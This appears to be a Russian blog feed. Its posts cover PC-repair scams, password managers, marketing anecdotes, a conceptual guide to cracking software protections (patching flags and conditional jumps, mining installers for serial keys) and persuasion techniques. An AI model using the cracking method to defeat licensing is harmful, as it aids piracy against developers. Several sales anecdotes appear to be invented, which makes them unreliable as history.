Как не попасться на мошенников при ремонте PC?

Ремонтировать компьютеры сложно, и этим пользуются мошенники, которые по сути почти ничего не делают, но берут столько денег, что быстрее и проще купить новое устройство. Как уберечь себя от них и что делать, если вы на них нарвались и не желаете платить лишние деньги?

Псевдомастера обычно ищут жертв на Avito, Юле или расклеивают объявления на подъездах, столбах и остановках в надежде поймать тех, у кого даже нет интернета. Они завлекают бесплатным выездом на дом и такой же бесплатной диагностикой. Стационарные компьютеры и другую крупную технику они обычно не увозят, а ремонтируют на месте, а ноутбуки, мониторы и другую мелочёвку могут забрать.

Цель недобросовестного мастера — как можно дешевле отремонтировать устройство и взять за ремонт в разы больше, чем нормальные мастерские. Например, если ваш ноутбук перегревается и выключается через несколько минут работы, его, вероятно, нужно лишь вскрыть и почистить от пыли (что вы можете сделать самостоятельно за несколько минут), но вас будут убеждать, что у него возникли проблемы с процессором и видеокартой, а заменить их отдельно не получится, нужно ставить новую материнскую плату, которая стоит полцены ноутбука. Если найдут проблему с кабелем монитора, то вместо того, чтобы посоветовать купить новый кабель за пару сотен рублей, вам расскажут о сломанной матрице или интерфейсной плате, которая стоит 5 или 10 тысяч.

Если вы жалуетесь всего на одну проблему, хитрый мастер найдёт в вашем компьютере ещё несколько, о которых вы даже не подозревали, и попытается раскрутить вас на дополнительные услуги: настройка BIOS, чистка винчестера от лишних файлов, оптимизация операционной системы, установка обновлений Windows, антивируса и других программ, обновление антивирусной базы, проверка секторов жёсткого диска, сканирование файлов на ошибки, ускорение интернета. Для него всё это деньги из воздуха, ничего полезного он не сделает.

Перечень оказанных услуг может оказаться дутым. Даже если компьютер и отремонтировали, в него установят старые комплектующие, а те, что вынули, перепродадут или поставят в другие устройства. Вышедшие из строя процессоры и видеокарты иногда просто прогревают феном, благодаря чему они какое-то время работают нормально, а в акте оказанных услуг может быть указано, что они заменены на новые, привезённые под заказ. Случается и так, что при приёме товара вам называют одну цену за ремонт, а после того, как вы приходите забирать отремонтированную вещь, выдают квитанцию совсем с другой суммой, в разы больше той, что была озвучена.

Некоторые «мастерские» ничего не ремонтируют, а работают как посредники: принимают технику, относят её к настоящим мастерам, получают обратно, накручивают сверху несколько тысяч рублей и требуют с клиентов в разы больше фактической стоимости услуги. Незнающего человека обмануть не так сложно, а к тому, кто ориентируется в ценах на комплектующие и услуги по ремонту, будет применяться психологический приём — ему откажутся возвращать технику до тех пор, пока он не заплатит.

Если вам отказываются возвращать товар вызывайте полицию и пишите заявление о хищении. Ваша собственность принадлежит только вам и никто не имеет права удерживать её у себя против вашей воли. Можете предложить мастерской взыскать с вас деньги за ремонт через суд. В этом случае ей придётся доказывать сумму убытков, но имейте в виду, что если с её стороны формально всё сделано грамотно, то вы, скорее всего, проиграете, и вам придётся не только заплатить требуемую сумму, но также возместить расходы компании на юриста.

Как не нарваться на поддельных мастеров? Постарайтесь найти мастерскую, которая работает несколько лет и хорошо зарекомендовала себя. Поспрашивайте знакомых, где они ремонтируют технику и куда рекомендуют обращаться. Если компания работает недавно и о ней ничего не известно, отдайте ей на пробу отремонтировать какую-нибудь мелочёвку и посмотрите, как она себя поведёт — если попытается обмануть, вы потеряете совсем немного, но поймёте, что туда лучше не обращаться. До ремонта попросите мастера сохранить все комплектующие, которые будут заменены на новые, и вернуть их вам. Возможно, они вам не пригодятся и вы их выбросите, но так вы обезопасите других клиентов от установки некачественных деталей, а кто-то из них, возможно, потом обезопасит вас.


  • Твой TORION
November 26, 2018
by @tor_ion
0
101

Топ 7 программ для хранения паролей

Примечание: если менеджер паролей вам требуется лишь для хранения учетных данных от сайтов, вполне возможно, для этого и не нужно устанавливать какие-то дополнительные программы — все современные браузеры имеют встроенный менеджер паролей, сравнительно безопасно их хранят и синхронизируют между устройствами, если вы используете учетную запись в браузере. В Google Chrome, помимо управления паролями, есть и встроенный генератор сложных паролей.

KeePass

Возможно, я немного старомоден, но когда речь заходит о хранении таких важных данных, как пароли, я предпочитаю, чтобы они хранились локально, в зашифрованном файле (с возможностью его переноса на другие устройства), без каких-либо расширений в браузере (у которых то и дело обнаруживаются уязвимости). Менеджер паролей KeePass — одна из самых известных бесплатных программ с открытым исходным кодом и именно таким подходом, доступная на русском языке.

LastPass

LastPass — наверное, самый популярный менеджер паролей, доступный для Windows, MacOS, Android и iOS. По факту, это облачное хранилище ваших учетных данных и в Windows оно работает как расширение браузера. Ограничение бесплатной версии LastPass — отсутствие синхронизации между устройствами. После установки расширения LastPass или мобильного приложения и регистрации, вы получаете доступ к хранению паролей, в браузере добавляется автоматическое заполнение данными, хранящимися в LastPass,

<

RoboForm


RoboForm — ещё одна программа на русском языке для хранения и управления паролями с возможностью бесплатного использования. Главное ограничение бесплатной версии — отсутствие синхронизации между различными устройствами.

После установки на компьютер, Roboform устанавливает как расширение в браузере и программа на ПК, с помощь которой можно управлять сохраненными паролями и другими данными. Также фоновый процесс RoboForm на компьютере определяет, когда вы вводите пароли не в браузерах, а в программах и также предлагает сохранить их.

Kaspersky Password Manager

Программа для хранения паролей Kaspersky Password Manager также состоит из двух частей: автономное ПО на компьютере и расширение браузера, которое берет данные из зашифрованной базы данных на вашем диске. Использовать её можно и бесплатно, но ограничение куда существеннее, чем в предыдущих вариантах: можно хранить всего 15 паролей.

Другие популярные менеджеры паролей

1Password — очень удобный мультиплатформенный менеджер паролей, с русским языком, но невозможностью бесплатного использования после завершения пробного периода. Официальный сайт — https://1password.com

DashLane — еще одно решение для хранения данных для входа на сайты, покупок, защищенных заметок и контактов с синхронизацией на разных устройствах. Работает и как расширение в браузере и как отдельное приложение. Бесплатная версия позволяет хранить до 50 паролей и без синхронизации. Официальный сайт — https://www.dashlane.com/

RememBear — мультиплатформенное решение для хранения паролей и других важных данных, автоматического заполнения форм на сайтах и аналогичных задач. Русский язык интерфейса не доступен, но сама программа очень удобная. Ограничение бесплатной версии — отсутствие синхронизации и резервного копирования. Официальный сайт — https://www.remembear.com/


  • Твой TORION
November 26, 2018
by @tor_ion
0
291

10 способов продать товар

1. Выдай недостатки за уникальные свойства

Как это сделал Джеймс Янг

Сваливать всю тяжелую работу на новичков — политика многих компаний. Где-то этот обряд называется инициацией, где-то — дедовщиной. Но практикуют его почти все. Исключением не стала и фирма рассылок «Джей Уолтер Томпсон» (JWT), куда в 1941 году пришел на работу молодой менеджер Джеймс Янг. Одновременно с ним в компанию пришла партия яблок, побитых морозом и покрытых черными пятнами. Фрукты предназначались для рассылки заказчикам, но, увидев, в каком они состоянии, руководство JWT ужаснулось. Менеджеры хотели было залить яблоки зеленым воском и разослать в таком виде, но потом их осенила идея получше — поручить реализацию яблок новичку. Чтобы Джеймс яблочки гадостью какой-нибудь поливал? Да ни за что!

Янг просто отправил их заказчикам, сопроводив посылки письмом: «Обратите внимание на эти пятна. Они указывают на то, что яблоки выращены в горах, при резких перепадах температур. Благодаря этому яблоки приобретают характерную для них сочность, сахаристость и аромат. Если окажется, что все сказанное нами не соответствует действительности, вы можете отослать весь товар назад». Конечно, ни один из заказчиков не вернул Джеймсу Янгу яблоки.

Более того, почти все заказы на яблоки следующего урожая сопровождались припиской: «Пришлите и в этот раз с пятнышками».


2. Бросайся в глаза

Как это сделал издатель 3Suisses

В 1931 году человеческая лень шагнула далеко вперёд: были придуманы первые каталоги товаров. Тогда их еще не рассылали по почте, а продавали в книжных лавках. Купил, отметил заказ, отдал рассыльному... Одно неудобно: каталогов было слишком много, от них рябило в глазах. Кончилось тем, что книготорговцы стали просто складывать их стопкой — пусть люди сами выуживают то, что им нужно. К радости педантов, каталоги были одного формата, и стопки получались на загляденье ровными. Настолько, что покупателям было даже как-то неловко их ворошить — они брали верхний каталог и уходили. Увидев это однажды, издатель 3Suisses вдвое уменьшил формат своих каталогов, так что продавцы книжных лавок вынуждены были класть их наверх стопки — ведь иначе стопка просто разваливалась! Благодаря этому, казалось бы, нехитрому трюку дела 3Suisses быстро пошли в гору.


3. Извлекай выгоду из собственных ошибок

Как это сделал Харли Проктер

Пока в мир не пришли телевизоры и Институт имени Эрисмана, производителям мыла приходилось долго убеждать покупателей в том, что их продукт — самый лучший. Это сейчас достаточно в течение 10 секунд показывать доверчивому грязнуле серо-зелёные пятнышки на экране, начитывая при этом заунывный рэп: «Кишечная палочка, стафилококк и другие...» На заре маркетинга мыловары шли на чудовищные ухищрения, чтобы продать людям пару лишних брусочков.

Тяжело приходилось в 1879 году и Харли Проктеру. Получив в наследство от отца мыловаренный бизнес, юноша ума не мог приложить, что с ним делать. Товар неделями лежал на складах, а на заводах стали случаться простои. Как-то раз один из чанов продержали на огне дольше обычного, отчего в мыльной массе образовались пузырьки, а отдушки выпарились. Получившееся мыло оказалось непривычно белым, нейтральным по запаху и очень лёгким. Харли хотел было вылить содержимое чана в выгребную яму, но на стадии охлаждения заметил, что мыло не тонет в ледяной воде, а собирается комками на поверхности и плавает. Тогда он создал новую марку мыла — Ivory. И стал продавать ее под слоганом «Мыло, которое не тонет!». Благодарные домохозяйки, уставшие ловить на дне раковин скользкие обмылки, тут же начали скупать новинку.

Так называемая ошибка принесла компании около 7 миллионов долларов!


4. Создай видимость заботы о людях

Как это сделала компания Spinach Can

В 1929 году на экранах (тогда еще не телевизоров, а кинотеатров) появился первый мультипликационный герой, на которого хотели быть похожими дети, — лупоглазый морячок Папай. Никаким морячком он, строго говоря, не был — так, служитель лодочной станции. Но героический образ Папая это не разрушало.

В каждом новом мультике этот человечек с неимоверно перекачанными мышцами от толстяка-злодея Блуто. И хотя обидчик был в три раза больше, победа всегда давалась Папаю легко: ведь он ел шпинат, заряжающий человека сверхсилой! Более мощной пропаганды здорового образа жизни Америка не видела никогда.

Морячка провозгласили секс-символом нового времени, а его создателя Макса Флейшера — борцом за оздоровление нации.

Ну а нежиться в лучах славы с максимальным комфортом Флейшеру помогли отчисления компании Spinach Can. Ведь это она под видом заботы о здоровье американцев осуществила первый в истории (и, пожалуй, самый циничный) продакт-плейсмент и спонсировала работу художников! А те стали изображать банку живительного шпината в руках Папая не как придется, а по образу и подобию продукта Spinach Can.

Компания получает дивиденды с идеи и по сей день. Правда всплыла наружу лишь пятнадцать лет назад, когда продакт-плейсмент уже стал обычным делом. Так что дельцов даже не забросали тухлым шпинатом.


5. Заставь всех говорить о тебе

Как это сделал Алекс Богуски

Этот креативный директор агентства Crispin Porter +Bogusky является одной из любопытнейших фигур маркетинга. Про Алекса, сравнительно молодого человека, рассказывают удивительные вещи. Мол, он устроился на работу в агентство, тогда еще принадлежавшее только Криспину и Портеру, вообще не имея за плечами опыта в рекламном бизнесе. Он просто прислал отцам-основателям свою визитку с одним скругленным углом и надписью: «На 25% безопаснее всех прочих визиток!» И якобы только благодаря этому Алекс Богуски сразу же получил пост директора. Впрочем, эта история может оказаться мифом — в отличие от истории с Mini Cooper, действительно имевшей место.

Когда в 2001 году Алекс получил заказ на раскрутку этих машин в Америке, там уже вовсю шла рекламная кампания главного конкурента Mini — фольксвагеновского «жука». Разведка доложила Богуски, что соваться на телевидение не имеет смысла: лучшее время для рекламы (во время трансляции финала Суперкубка по американскому футболу) уже куплено Volkswagen. Тогда Богуски придумал обходной маневр. Он выкупил несколько трибун в разных местах стадиона и разместил на них помосты с Mini Соореr.

Создавалось впечатление, что глазастые машинки наблюдают за матчем. В итоге все спортивные телеканалы сочли своим долгом уделить Mini несколько минут в своих трансляциях.

Дорогостоящее эфирное время досталось автомобилям абсолютно бесплатно! Богуски стал одним из самых востребованных рекламщиков мира.


6. Устрой эффектную демонстрацию

Как это сделали Акио Морита и 6000 коммивояжеров

В 1957 году компания Sony сгоряча провозгласила наступление эры карманной техники и анонсировала выпуск транзисторного радиоприемника, который можно будет всюду носить с собой. В те времена, когда б��тарейки были размером с фотокамеру, а камеры — с чемодан батареек, заявление было поистине смелым. Увы, когда инженеры Sony собрали-таки приёмник, выяснилось, что в карман стандартной рубашки он не помещается. Избежать всеобщей депрессии и корпоративных харакири удалось исключительно благодаря смекалке Акио Мориты, одного из боссов компании. Он предложил распространять приёмник не через магазины техники, а с помощью коммивояжеров.

Шесть тысяч человек по всему миру должны были стучаться в незнакомые дома и предлагать хозяевам новый приемник, который «осинь лихко памессяется в кармани — ап!». С этими словами коммивояжер должен был несколько раз достать коробочку с транзистором из кармана рубашки, а потом положить ее обратно. Сделать это было несложно: ведь для каждого коммивояжера Sony пошила специальные рубашки с увеличенным карманом! Из четырех тысяч человек, купивших приёмник в первый же день продаж, ни один не заметил подвоха. А те, что заметили его пару часов спустя, списали на неправильный крой своих рубашек.


7. Устрой мозговой штурм

Как это сделал Брюс Бартон

Гениальная идея, принесшая рекламному агентству Batton, Barton & Osbourne полмиллиона долларов, зародилась, согласно легенде, в немытой голове юноши-курьера. А дело было так. В 1957 году американская фирма Henckels выпустила партию ножей для чистки картофеля. Они были удобными и жутко футуристичными: пластиковая ручка, лезвие, которое само затачивается. Первая партия была раскуплена за неделю, но потом ножи перестали брать.

Henckels оказалась заложником своих инноваций: ножи были так хороши, что хозяйки не меняли их на новые. Когда призрак банкротства уже стоял над боссами Henckels с картофелечисткой у горла, им пришло в голову попросить совета у Брюса Бартона и его рекламного агентства. Поразмышляв над проблемой неделю, Бартон сдался и устроил первый в истории маркетинга мозговой штурм. В течение 16 часов сотня половозрелых, психически здоровых сотрудников ВВ&О ходила по коридорам, выкрикивая свои ассоциации со словами «нож», «картофель» и «чистка». Наконец один из курьеров предложил гениальное решение — покрасить ручки ножей в цвет картофельных очисток.

Это помогло: домохозяйки стали случайно выбрасывать ножи вместе с кожурой и мчаться в магазин за новыми. А Брюс Бартон написал книгу о мозговом штурме и до конца жизни жил на гонорары.


8. Заготовь пути к отступлению

Как это сделало Шведское телевидение

Человечество всегда с недоверием относилось к новинкам. Монголо-татарское иго, летательные аппараты, фаст-фуд — все эти вещи пришлось внедрять не одно десятилетие. Но, пожалуй, ничто не встретило такого отторжения, как нейлоновые чулки. Прочный, почти космический материал диких расцветок долго не мог составить серьезной конкуренции традиционному шелку. В 1962 году нейлон пришел в холодную Швецию, где женщины ходили в чулках даже летом. Но выяснилось, что он и там никому не нужен. Тогда производители чулок обратились к шведскому телевидению.

Тамошние работники долгое время не знали, как организовать рекламную кампанию. Расхваливание преимуществ нейлоновых чулок перед шелковыми было бы ложью, за которую в то время очень строго наказывали. Тогда телевизионщики нашли изящное решение. 1 апреля они объявили, что «черно-белый экран вашего телевизора можно превратить в цветной, натянув на него несколько нейлоновых чулков разного цвета».

В тот же вечер тысячи доверчивых зрителей бросились в магазин за чулками. А на следующий день те же тысячи зрителей — правда, на сей раз негодующих — пошли штурмом на здание телецентра: ведь даже комбинация красного, зеленого и синего чулок не привнесла в их жизнь красок. Но работники телецентра с заранее заготовленными улыбками открестились от своей рекламы на всю страну: «Да вы что, ребят, это была шутка!»

Обманутым шведским женщинам только и оставалось, что начать носить нейлоновые чулки — не выкидывать же их. Со временем новинка даже вошла в моду.


9. Компрометируй конкурентов

Как это сделал Финеас Барнум

Красноносый клоун Рональд из McDonald’s — не единственный цирковой работник, подвязавшийся на ниве рекламы. Задолго до него, в XIX веке, к продвижению брендов приложил свою ловкую руку Финеас Барнум. В обычной жизни этот человек был цирковым антрепренером — ездил по Штатам и отыскивал уродов, и силачей, чтобы вывести их на большую арену. Но иногда (в полнолуние или, скажем, за большое вознаграждение) Финеас превращался в специалиста по маркетингу. Так было и в 1890 году, когда к Барнуму пришел владелец заводов-пароходов Честер Дитс, зарабатывавший на жизнь ловлей белого лосося. С заработками у него, надо сказать, было плохо. К тому времени, как он открыл свой бизнес, вся Америка была уже завалена розовым лососем. Белая рыба на фоне семги выглядела несвежей и расходилась плохо.

За какие-то 15% от будущей выручки Барнум нашел простое и изящное решение — предложил паковать белую лососину в банки с надписью: «Единственный лосось, который не розовеет от контакта с упаковкой!»

Консервы стали продаваться так хорошо, что заводы Дитса едва успевали справляться с количеством заказов. Гонорара, полученного за идею, Барнуму хватило до конца жизни — впрочем, умер он в 1891 году.


10. Проводи разведку на местности

Как это сделал Этторе Соттсасс

Куда было деваться после развала Третьего рейха австрийскому художнику, асу военно-промышленного дизайна, чьим излюбленным делом было нанесение звездочек на фюзеляжи? Только в Италию — страну, самым гуманным образом обошедшуюся со своими фашистами. Так и сделал военный дизайнер Соттсасс: после Второй мировой он тайком перебрался на Апеннины и устроился на работу в фирму Olivetti. Первым же заказом Этторе было обновление дизайна механического будильника, который чрезвычайно плохо продавался. Осмотрев товар со всех сторон и не найдя в нем изъянов, художник отправился в ближайший часовой магазин и залег в засаду. Там он с удивлением обнаружил, что все (без исключения!) покупатели, прежде чем купить будильник, проверяют его на вес. Легкие модели, в число которых входил и Olivetti, просто не внушали людям доверия.

Тогда Соттсасс впаял в будильник свинцовую чушку и принёс его лично Адриано Оливетти. «Ну и где ваш хвалённый дизайн?» — спросил тот. «Все, больше ничего не надо, так он будет продаваться!» — заявил Соттсасс. И оказался прав, за что получил пожизненную пенсию от Olivetti и славу основателя нового направления в дизайне.


  • Твой TORION
November 26, 2018
by @tor_ion
0
359

Взлом программ

Как известно, не существует защиты, которую нельзя было бы сломать. Любое программное обеспечение рано или поздно подвергается взлому. Затем во Всемирной сети появляются левые серийные ключи, специальные патчи, а порой и просто модифицированные файлы, с помощью которых можно заставить программу работать, не приобретая ее у разработчика. Наверное, всего наберется не больше сотни программ, которые никогда не были взломаны, и то только потому, что являются узкоспециализированными и надежно защищенными, причем от взлома их спасает именно узкая специализация, а отнюдь не надежная защита.

Прежде всего рассмотрим понятие «крэк» (крак, кряк), представляющее собой кальку с английского слова crack, которое имеет множество значений, но ближе всего к теме нашей статьи значения «решать трудную задачу» и «раскалываться, давать трещину, ломаться». Впоследствии в Интернете так стали называть программы для взлома защиты, а крэкингом — сам процесс взлома.


Дзен-крэкинг

Существуют различные варианты взлома, и в зависимости от ситуации крэкер пользуется тем или иным подходом. В целом существуют два способа взлома. Большинство прибегает к так называемому дзен-крэкингу, в основе которого лежит принцип: «я не знаю, как это работает, но я могу это сломать». Другой же метод заключается в детальном изучении программы и ее функционала.

Кроме того, необходимо знание команд ассемблера, способов передачи параметров в процедуры и функции, системных вызовов ОС, различных компиляторов и т.п. Без этого изучать крэкинг - бесполезно. Поскольку для взлома не всегда необходимо все об этой программе, во многих случаях можно обойтись приблизительным пониманием и анализом встроенной защиты. Первый метод позволяет намного быстрее получить готовый результат. Второй же требует усилий и времени. Безусловно, когда происходит взлом по второму методу, количество ошибок, а также багов при работе с программой будет значительно меньше. Первый метод  — наиболее распространен среди крэкеров. В этом случае крэкер сначала строит предположения о том как это может быть реализовано. Как ни странно, при использовании этого метода успех зависит не только от знаний, но и от того, насколько богато у крэкера воображение. Поэтому в данном случае эффективность дзен-крэкинга зависит прежде всего от наблюдательности и смелости предположений.

Необходимо собрать как можно больше информации о программе. Необходимо выяснить, упакована она или нет, какие ограничения содержатся в незарегистрированной программе и как выглядит процесс регистрации. Кроме того, следует проанализировать, какие текстовые строки и ресурсы содержатся внутри программы; поинтересоваться, к каким файлам и ключам реестра программа обращается при запуске, и многое другое. Как это ни странно, полезно заглянуть в справочную систему программы — там можно найти описание различий между зарегистрированной и незарегистрированной версиями. Вполне возможно, будет не особо полезна, однако быть во всеоружии всегда лучше.

Представим, что есть программа, которая выполняет некое действие. К примеру, она отказывается запускаться по истечении 15 дней с момента ее первого запуска. При этом появляется окошко с предупреждением — это и есть первое наблюдение. Если при переводе системной даты назад программа все равно не запускается, вывод: программа каким-то образом проверяет текущую дату, но при этом не основывается на показаниях часов операционной системы. Можно предположить, что программа либо сделала пометку о том, что запуск больше невозможен, либо все-таки определяет время другим способом. Здесь есть два пути: подумать какие варианты определения времени можно использовать, или искать в системном реестре либо в исполняемых файлах ссылку на запрет запуска. Однако сначала необходимо понаблюдать за производимыми программой действиями, которые являются признаками защиты. Если программа не просто «задумывается» при запуске, но еще и шуршит винчестером, вероятность того, что она проверяет файлы на дату/время создания — увеличивается. В противном случае необходимо разбирать, какие условные переходы, связанные с этим окном происходят, и к каким функциям в это время происходит обращение.

Любые встроенные защиты имеют уязвимости. Их уязвимость может быть спрятана глубоко в недрах кода, распределена по нескольким десяткам процедур или же совершенно неочевидна — однако она есть. Залог успешного взлома — в отыскании уязвимых мест в защите.

Наиболее подходящими для крэкеров дырами являются глобальные переменные, в которых хранятся сведения о состоянии программы. функции, возвращающие критичное для защиты значение и процедуры, выводящие сообщение об успешной или неуспешной попытке регистрации, а также об истечении триального срока программы. В некоторых случаях изменение 0 на 1 делает программу зарегистрированной и полностью работоспособной, что и является главной задачей крэкера. Поэтому поиск констант и их изменение — наиболее оптимальное решение.

Другая уязвимость, которая сильно облегчает жизнь крэкерам, — это проблема условного перехода, заключающаяся в том, что реализовать проверку какого-либо условия, не использовав напрямую команду условного перехода, не так-то просто. Чем же отличаются команды условных переходов? А тем, что любой такой переход очень легко превратить в такой же, но с противоположным условием — обычно для этого достаточно исправить всего один бит. Несмотря на техническую простоту, правка условных переходов все-таки менее предпочтительна, чем модификация функций. Это объясняется тем, что условных переходов, имеющих отношение к защите, в программе может быть довольно много и их поиск требует особой внимательности.

Однако при правке условных переходов возникают проблемы, поскольку не всегда следует доверять тому, что происходит в программе после изменения данных. Первой ошибкой является неверная интерпретация собранной информации. Защитные функции могут находиться перед самым носом у крэкера. Изменение условного перехода тоже не всегда приводит к желаемому результату — во многих случаях программа продолжает вести себя как незарегистрированная из-за нескольких слоев защиты. При этом эффект может быть совершенно противоположный: изменение условного перехода приводит к регистрации программы, но окна регистрации все еще вылазят.

Описанные выше приемы взлома применяются в большинстве случаев, однако в некоторых ситуациях защита встроена в установщик, которым инсталлируется программа. В нем, кроме файлов, которые требуется установить содержится сценарий инсталляции. Поскольку написание собственного инсталлятора — дело трудоемкое, для большинства небольших программ используется один из готовых продуктов. Инсталляционный скрипт описывает, в каком режиме устанавливается тот или иной файл, какие данные необходимо внести в реестр и многое другое. В это «многое другое» могут входить и проверка серийных номеров, создание записей в реестре, а также распаковка и запуск программ. Поэтому защиту от запуска незарегистрированной со сроком действия версии следует искать именно в инсталляционном файле. При этом реализация защиты может быть совершенно различной — от простых меток в реестре до создания точки отсчета времени от системной библиотеки самой операционной системы. В качестве метки, по которой программа будет проверять ограничения по времени, может использоваться какой-либо файл, создаваемый в процессе инсталляции, особенно если этот файл спрятан где-нибудь глубоко в системных директориях. Самый надежный способ нахождения подобных функций защиты — декомпиляция инсталляционного файла и последующий разбор его по байту. В случае, если инсталляционная программа произведена сторонним разработчиком, можно написать универсальный патч для обхода защиты всех программ, которые используют эту версию инсталляционного пакета. В этом случае, не углубляясь в код инсталляционного файла, можно обнаружить запросы к файлам, а также создание ключей в реестре. Подобные утилиты мониторинга за ОС позволяют делать слепки системы на разных этапах ее инсталляции, а путем сравнивания исходных значений с полученными можно выяснить результат действия инсталляционного пакета.

Иногда инсталлятор может содержать сериальные ключи если при установке необходимо ввести ключ. С помощью нехитрых манипуляций с инсталляционным файлом можно получить список или хотя бы хэш-функцию, защиты серийного ключа. Существуют три основных метода проверки серийного ключа: сравнение с эталонными значениями, проверка серийного ключа по его хэшу и сверка хэшей серийных ключей. Но, поскольку в инсталлятор может быть включено несколько номеров, это упростит задачу.

Вспомогательные программы

Инструменты — это одно из главных орудий крэкера, без них он как без рук. Но сами по себе такие инструменты не более чем программа, главное — уметь их использовать. Будет ли полезен лучший в мире отладчик, если человек не знает, что означают те цифры и буквы, которые появляются на его экране? Поэтому, прежде чем задать программе вопрос, необходимо быть уверенным, что вы сможете понять ответ. Тем не менее от качества инструментов во многом зависит скорость и эффективность действий крэкера. Инструментарий должен регулярно обновляться, поскольку программы тоже постоянно совершенствуются, наращивают мощность, обрастают новыми полезными и бесполезными функциями, к тому же их защита и реализация тоже постоянно улучшаются. Инструментов для крэкинга существует великое множество, главное — отбирать из них самые эффективные, быстрые и удобные. Некоторые крэкеры возражают против использования готовых решений, поскольку это чрезмерно упрощает процесс взлома и «некрасиво». Но, поскольку в крэкинге необходим конечный результат, а не красота, большинство пользуется всеми подручными средствами, дописывая уже готовые программы для собственных нужд.



Существует несколько типов программ, активно применяемых для взлома защиты программы:

Отладчики и дизассемблеры

Данные инструменты традиционно используются в паре, поскольку дизассемблер выдает лишь «чистый код», хотя современные дизассемблеры способны также распознавать вызовы стандартных функций, выделять локальные переменные в процедурах и предоставлять прочие подобные услуги. Пользуясь дизассемблером, можно лишь догадываться, какие данные получает та или иная функция в качестве параметров и что они означают. Чтобы выяснить это, чаще всего требуется изучение если не всей программы, то довольно значительной ее части.

Отладчики выполняют принципиально иные функции: они позволяют анализировать код в процессе его работы, отслеживать и изменять состояние регистров и стека, править код на лету — в общем, наблюдать за «личной жизнью» программы и даже активно в нее вмешиваться. Оборотной стороной медали является «неинтеллектуальность» многих отладчиков — их врожденные способности к анализу кода редко простираются дальше определения направления перехода.


Шестнадцатеричные редакторы и редакторы ресурсов

Это, несомненно, наиболее древние (по идее, но необязательно по исполнению) из программистских инструментов, ведущие свою историю с тех времен, когда программисты еще умели читать и править исполняемый код, не прибегая к помощи дизассемблеров. Редакторы ресурсов, в принципе, занимаются тем же самым, но по отношению к прилинкованным к исполняемому файлу ресурсам. Именно при помощи редакторов ресурсов выполняется значительная часть работ по «независимой» русификации программ и доработке интерфейсов. Наряду с редакторами используются всевозможные патчеры, которые позволяют создать небольшой исполняемый файл, автоматически вносящий изменения в оригинальный файл программы либо в код этой программы непосредственно в памяти.


Прочие утилиты

Существует также огромное количество утилит, не вписывающихся в рассмотренные выше категории или попадающих в несколько категорий сразу. Поскольку крэкинг — занятие весьма многогранное, столь же многогранны используемые для него инструменты. Более того, некоторые утилиты, которые могут быть полезны для крэкера, создавались для совершенно иных целей (хорошим примером может служить программа GameWizard32, которая, вообще-то, предназначена для того, чтобы мухлевать в компьютерных играх, но оказалась полезной при вскрытии программы с ограничением на максимальное число вводимых записей). Как невозможно объять необъятное, так и нельзя описать все программы, которые применяются для крэкинга.


Заключение

Напоследок отметим, что крэкеры делятся на три группы: на тех, для кого крэкинг — хобби, на тех, кто занимается этим в качестве самообразования, и на тех, кто зарабатывает на взломе защиты программ. Поскольку в России пиратство распространено широко, во многих случаях крэкинг обеспечивает неплохой доход.

Однако крэкинг — это палка о двух концах: хотя само по себе это действие незаконно, оно способствует развитию систем защиты, которые совершенствуются изо дня в день, а если изучать методы крэкинга и опробовать их на практике, то можно получить хороший опыт в написании систем защиты программ. Создать же абсолютную защиту невозможно — любая программа рано или поздно будет взломана.


  • Твой TORION
November 25, 2018
by @tor_ion
0
220

Как убеждать и влиять на людей?

Любая попытка в резкой форме навязать нужное мнение повлечет лишь к отрицательному результату, ибо человек всегда противодействует ограничению свободы выбора. Всякое влияние может содержать в себе элементы внушения и убеждения, но в разном количестве. Вот структура убеждающего воздействия и методы воздействия убеждением.


Убеждение — это способ воздействия на сознание людей, обращенный к их собственному критическому восприятию.

Используя метод убеждения, психологи выходят из того, что оно нацелено под интеллектуально-познавательную сферу человеческой психики. Его суть в том, чтобы с помощью логических аргументов сначала добиться от человека внутреннего согласия с определенными умозаключениями, а затем на этой основе сформировать и закрепить новые установки (или трансформировать старые), соответствующие поставленной цели.

Убеждая, необходимо следовать определенным правилам:

  • логика убеждения должна быть доступной интеллекту цели воздействия;
  • убеждать надо доказательно, опираясь на факты, известные человеку;
  • помимо конкретных фактов и примеров (без них нельзя убедить тех, кому недостает широты кругозора, развитого абстрактного мышления), информация должна содержать обобщенные положения (идеи, принципы);
  • убеждающая информация должна выглядеть максимально правдоподобной;
  • сообщаемые факты и общие положения должны быть такими, чтобы вызвать эмоциональную реакцию.

 

Критерием результативности убеждающего воздействия является убежденность. Это глубокая уверенность в истинности усвоенных идей, представлений, понятий, образов. Она позволяет принимать однозначные решения и осуществлять их без колебаний, занимать твердую позицию в оценках тех или иных фактов и явлений.

Благодаря убежденности формируются установки людей, определяющие их поведение в конкретных ситуациях.

Важная характеристика убежденности — ее глубина. Она прямо связана с предыдущим воспитанием людей, их информированностью, жизненным опытом, способностью анализировать явления окружающей действительности, и многими другими факторами.

Глубокая уверенность характеризуется большой устойчивостью. Как показывает практика, для того чтобы ее поколебать, недостаточно одних только логических выводов. Убеждающее воздействие целесообразно осуществлять в следующих случаях:

  • Когда объект воздействия в состоянии воспринять полученную информацию.
  • Если человек психологически способен согласиться с навязываемым ему мнением. Поэтому равно важны правильный выбор цели психологического воздействия и содержание общения.
  • Человек способен сопоставлять различные точки зрения, анализировать систему аргументации. Иными словами, убеждающее воздействие эффективно лишь при том условии, что его объект в состоянии понять и оценить то, что ему преподносится.
  • Если есть время убеждать. Для того чтобы убедить людей в чем-то, особенно в том, что выгодно противоположной стороне, как правило, требуется время. Изменения в сфере рационального мышления людей происходят лишь после сопоставления и обдумывания фактов, что предполагает значительные временные затраты. Помимо этого, разнообразное содержание убеждающего воздействия требует многократного подтверждения различными аргументами и фактами, что также «растягивает» процесс.

 

Структура убеждающего воздействия

Убеждающее воздействие обычно включает:

  • воздействие источника информации;
  • воздействие содержания информации;
  • воздействие ситуации информирования. 

Воздействие источника информации. Эффективность убеждения в определенной мере зависит от того, как воспринимающие его люди относятся к источнику информации.

Воздействие содержания информации. Во-первых, воздействие содержания информации во многом зависит от того, насколько оно доказательно и убедительно.

Доказательность основывается на логичности, правдоподобии и непротиворечивости изложенного материала. Иначе говоря, важно не только то, что сообщается, но и то, каким образом это делается. Доказательность не включает в себя автоматически убедительность.

Специалисты исходят из того, что:

  • содержание информационных материалов должно быть хорошо продумано и соответствовать законам формальной логики;
  • конкретное в содержании информационного сообщения кажется убедительнее абстрактного;
  • чем динамичнее текст, чем ярче и разнообразнее содержащиеся в нем факты, тем больше он привлекает внимание;
  • лучше воспринимается то, что близко интересам и потребностям объекта воз действия;
